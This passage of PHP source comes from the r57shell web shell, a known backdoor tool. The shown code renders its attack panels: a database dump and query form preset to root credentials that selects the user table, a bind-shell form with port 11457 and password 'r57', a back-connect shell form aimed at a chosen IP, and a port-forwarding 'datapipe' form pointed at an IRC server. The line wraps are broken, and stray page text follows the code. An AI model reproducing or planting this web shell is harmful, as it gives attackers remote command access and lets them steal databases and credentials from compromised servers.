guage.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1'));
echo
sr(45,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','dif_name',15,(!emp
ty($_post['dif_name'])?($_post['dif_name']):("dump.sql"))));
echo sr(45,"",in('submit','submit',0,$lang[$language.'_butt9']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=verdana size=-2><b><div
align=center>".$lang[$language.'_text83']."</div></b></font>";
echo sr(45,"<b>".$lang[$language.'_text80'].$arrow."</b>","<select
name=db><option>mysql</option><option>mssql</option><option>postgresql</option><op
tion>oracle</option></select>");
echo
sr(45,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','db_port',15,(!empt
y($_post['db_port'])?($_post['db_port']):("3306"))));
echo
sr(45,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','mysql_l',15,(!empt
y($_post['mysql_l'])?($_post['mysql_l']):("root"))));
echo
sr(45,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_p',15,(!empt
y($_post['mysql_p'])?($_post['mysql_p']):("password"))));
echo
sr(45,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!emp
ty($_post['mysql_db'])?($_post['mysql_db']):("mysql"))));
echo
sr(45,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in(
'hidden','cmd',0,'db_query'),"");
echo $te."<div align=center><textarea cols=35
name=db_query>".(!empty($_post['db_query'])?($_post['db_query']):("show
databases;\nselect * from
user;"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</di
v></td>".$fe."</tr></table>";
}
if(!$safe_mode&&!$windows){
echo $table_up1.$lang[$language.'_text81'].$table_up2.$ts."<tr>".$fs."<td
valign=top width=34%>".$ts;
echo "<font face=verdana size=-2><b><div
align=center>".$lang[$language.'_text9']."</div></b></font>";
echo
sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'))
;
echo
sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57
'));
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\"
name=\"use\"><option value=\"perl\">perl</option><option
value=\"c\">c</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=verdana size=-2><b><div
align=center>".$lang[$language.'_text12']."</div></b></font>";
echo
sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('r
emote_addr')) ? (getenv('remote_addr')) : ("127.0.0.1"))));
echo
sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'))
;
echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\"
name=\"use\"><option value=\"perl\">perl</option><option
value=\"c\">c</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
echo "<font face=verdana size=-2><b><div
align=center>".$lang[$language.'_text22']."</div></b></font>";
echo
sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11
457'));
echo
sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'i
rc.dalnet.ru'));
echo
sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6
667'));
echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\"
name=\"use\"><option value=\"perl\">datapipe.pl</option><option
value=\"c\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
echo $te."</td>".$fe."</tr></table>";
}
echo $table_up3."<div align=center><font face=verdana size=-2><b>o---[ r57shell -
http-shell by rst/ghc | <a href=http://rst.void.ru>http://rst.void.ru</a> | <a
href=http://ghc.ru>http://ghc.ru</a> | version ".$version." ]---
o</b></font></div></td></tr></table>".$f;
?>

You might also like